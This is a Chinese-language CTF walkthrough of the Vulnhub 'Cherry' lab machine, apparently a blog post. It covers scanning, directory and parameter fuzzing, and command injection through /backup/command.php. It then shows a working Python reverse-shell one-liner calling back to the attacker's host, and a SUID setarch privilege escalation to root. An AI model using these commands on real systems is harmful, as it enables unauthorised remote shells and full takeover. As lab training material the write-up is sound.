Cherry
识别目标主机IP地址
由于目标主机无法自动获取IP地址,参照本人另文首先解决该问题。
─(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:92:75:55 1 60 PCS Systemtechnik GmbH
192.168.56.178 08:00:27:8b:af:48 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.178
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.178 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 20:40 EST
Nmap scan report for 192.168.56.178
Host is up (0.000076s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8bc6f56e2ca29513a51084a50c83b7ae (RSA)
| 256 38d823063e862ac90f163f2393d9a106 (ECDSA)
|_ 256 95b9d4f0984ad90990a45da79d6dce76 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Cherry
|_http-server-header: nginx/1.18.0 (Ubuntu)
7755/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Cherry
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.93%I=7%D=1/30%Time=63D87184%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:8B:AF:48 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.01 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、7755(HTTP)、33060(Mysqlx)
获得Shell
80端口
将图片下载到Kali Linux本地进行分析:
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ ls
img.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ steghide extract -sf img.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ stegseek img.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.95% (133.4 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ exiftool img.jpg
ExifTool Version Number : 12.52
File Name : img.jpg
Directory : .
File Size : 59 kB
File Modification Date/Time : 2023:01:30 20:43:41-05:00
File Access Date/Time : 2023:01:30 20:44:03-05:00
File Inode Change Date/Time : 2023:01:30 20:43:41-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Image Width : 1024
Image Height : 1024
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1024x1024
Megapixels : 1.0
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ curl http://192.168.56.178/robots.txt
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ nikto -h http://192.168.56.178
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.178
+ Target Hostname: 192.168.56.178
+ Target Port: 80
+ Start Time: 2023-01-30 20:45:10 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2023-01-30 20:45:24 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (nginx/1.18.0) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ gobuster dir -u http://192.168.56.178 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.178
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/30 20:46:28 Starting gobuster in directory enumeration mode
===============================================================
/backup (Status: 301) [Size: 178] [--> http://192.168.56.178/backup/]
Progress: 214882 / 220561 (97.43%)===============================================================
2023/01/30 20:46:43 Finished
===============================================================
gobuster发现了backup目录,访问该目录,返回禁止访问
7755端口
自然地利用访问访问7755端口下的backup目录,发现可以正常访问,将文件下载到本地:
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/latest.tar.gz .
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip .
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip.bak
mv: missing destination file operand after '/home/kali/Downloads/master.zip.bak'
Try 'mv --help' for more information.
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip.bak .
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ ls
img.jpg latest.tar.gz master.zip master.zip.bak nmap_full_scan
而访问/backup/command.php,返回为空,是否需要FUZZ 参数?暂时搁置,看下下载的文件中有无有价值的信息
┌──(kali㉿kali)-[~/Vulnhub/Cherry/wordpress]
└─$ gobuster dir -u http://192.168.56.178:7755 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.178:7755
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/01/30 20:54:25 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 281]
/index.html (Status: 200) [Size: 640]
/.php (Status: 403) [Size: 281]
/info.php (Status: 200) [Size: 72699]
/backup (Status: 301) [Size: 324] [--> http://192.168.56.178:7755/backup/]
/.php (Status: 403) [Size: 281]
/.html (Status: 403) [Size: 281]
/server-status (Status: 403) [Size: 281]
Progress: 1097489 / 1102805 (99.52%)===============================================================
2023/01/30 20:55:31 Finished
===============================================================
──(kali㉿kali)-[~/Vulnhub/Cherry/wordpress]
└─$ wfuzz -c -u 'http://192.168.56.178:7755/backup/command.php?FUZZ=id' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 22
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.178:7755/backup/command.php?FUZZ=id
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001626: 200 13 L 25 W 306 Ch "backup"
很快就FUZZ出参数名称为backup,手动验证一下,确实如此。
尝试了若干种反弹shell的方法,最后利用python可以成功获得shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.206",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
http://192.168.56.178:7755/backup/command.php?backup=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.178] 45556
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cherry:/var/www/html/backup$
提权
将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,执行该脚本,从脚本执行结果得知:
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 39K Apr 2 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 55K Apr 2 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-sr-x 1 root root 27K Apr 2 2020 /usr/bin/setarch
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
可以利用setarch命令的SUID位进行提权
参考GTFOBINS网站的提权方法进行提权:
www-data@cherry:/tmp$ /usr/bin/setarch $(arch) /bin/sh -p
/usr/bin/setarch $(arch) /bin/sh -p
# cd /root
cd /root
# ls -alh
ls -alh
total 44K
drwx------ 5 root root 4.0K Sep 7 2020 .
drwxr-xr-x 20 root root 4.0K Sep 7 2020 ..
-rw------- 1 root root 164 Sep 7 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Sep 7 2020 .local
-rw------- 1 root root 18 Sep 7 2020 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
drwx------ 2 root root 4.0K Sep 7 2020 .ssh
-rw-r--r-- 1 root root 255 Sep 7 2020 .wget-hsts
-rw-r--r-- 1 root root 46 Sep 7 2020 proof.txt
drwxr-xr-x 3 root root 4.0K Sep 7 2020 snap
# cat proof.txt
cat proof.txt
Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b
#
成功拿到了root shell以及root flag
标签:Shell,x1a,Cherry,x08,Vulnhub,x0b,kali,root,x05 From: https://www.cnblogs.com/jason-huawen/p/17078093.html